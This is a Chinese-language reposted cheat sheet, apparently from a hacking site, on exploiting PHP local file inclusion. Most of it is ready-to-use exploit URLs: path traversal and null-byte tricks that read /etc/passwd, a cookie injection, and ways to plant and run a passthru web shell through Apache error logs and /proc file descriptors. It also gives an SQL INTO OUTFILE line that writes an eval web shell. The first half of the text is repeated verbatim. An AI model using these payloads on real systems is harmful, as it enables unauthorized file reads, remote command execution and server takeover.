转自:http://www.myhack58.com/Article/html/3/7/2012/36277.htm
1、文件包含利用
通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.Type of call:
require($file);
Exploit:
http://host/?file=/etc/passwd
Type of call:
require("includes/".$file);
Exploit:
http://host/?file=../../../../../etc/passwd
Type of call:
require("languages/".$lang.".php");
require("themes/".$theme."/config.php");
Exploit:
http://host/?file=../../../../../etc/passwd%00
Type of call:
require("languages/".$_COOKIE['lang'].".php");
Exploit:
javascript:document.cookie = "lan=../../../../../etc/passwd%00″;
2、包含命令执行
当能够把这句代码<? passthru($_GET[cmd]) ?> 上传到服务器,然后利用文件包含就可以。
利用方式1:将内容插入apache日志里面。
请求不存在的页面:http://host/xxxxxxx=<? passthru($_GET[cmd]) ?>
然后按照前面的方式请求:
http://host/?file=../../../var/apache/error_log&cmd=ls /etc
http://host/?file=../../../var/apache/error_log&cmd=uname -a
如果不知道apache地址,可以利用包含已有的文件报错来爆出当前位置,当然这个也得依靠不同的操作系统,apache默认地址不一样。
另外可以通过枚举进程表来定位apache日志路径。/proc/{PID}/fd/{FD_ID}
pepelux:~$ perl proc.pl http://host/index.php page GET
Apache PID: 4191
FD_SIZE: 64
FD: 2
得到PID 和 FD_ID后就可以这么构造。
http://host/?file=/proc/4191/fd/2&cmd=uname -a
http://host/index.php?x=<? passthru($_GET[cmd]) ?>
1、文件包含利用
通过传递本地或者远程的文件(allow_url_fopen开启)作为参数进行利用,可以读取敏感信息、执行命令、GetWebshell.
Type of call:
require($file);
Exploit:
http://host/?file=/etc/passwd
Type of call:
require("includes/".$file);
Exploit:
http://host/?file=../../../../../etc/passwd
Type of call:
require("languages/".$lang.".php");
require("themes/".$theme."/config.php");
Exploit:
http://host/?file=../../../../../etc/passwd%00
Type of call:
require("languages/".$_COOKIE['lang'].".php");
Exploit:
javascript:document.cookie = "lan=../../../../../etc/passwd%00″;
2、包含命令执行
当能够把这句代码<? passthru($_GET[cmd]) ?> 上传到服务器,然后利用文件包含就可以。
利用方式1:将内容插入apache日志里面。
请求不存在的页面:http://host/xxxxxxx=<? passthru($_GET[cmd]) ?>
然后按照前面的方式请求:
http://host/?file=../../../var/apache/error_log&cmd=ls /etc
http://host/?file=../../../var/apache/error_log&cmd=uname -a
如果不知道apache地址,可以利用包含已有的文件报错来爆出当前位置,当然这个也得依靠不同的操作系统,apache默认地址不一样。
另外可以通过枚举进程表来定位apache日志路径。/proc/{PID}/fd/{FD_ID}
pepelux:~$ perl proc.pl http://host/index.php page GET
Apache PID: 4191
FD_SIZE: 64
FD: 2
得到PID 和 FD_ID后就可以这么构造。
http://host/?file=/proc/4191/fd/2&cmd=uname -a
http://host/index.php?x=<? passthru($_GET[cmd]) ?>
http://host/?file=../../../tmp/sql.txt&cmd=uname -a
补充说明:
1) php5.3.4以后已经修复了%00漏洞。
2) 前段时间select * from kj_tab limit 1 INTO OUTFILE “d:/kj.txt” LINES TERMINATED BY “<?php eval($living)?>”
3) 参考文件中有几个perl写的小工具帮助利用。
4) LFI配合phpinfo获取shell,参见LFI With PHPInfo Assistance.pdf
5) 关于包含命令执行中方式2中80sec也有类似的文章。
参考文件:
Web vulnerabilities to gain access to the system http://www.enye-sec.org/en/papers/web_vuln-en.txt
links:
http://www.ourren.com/file-contains-the-summary-into-the-use-of.html
http://www.waitalone.cn/post/1036.html
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
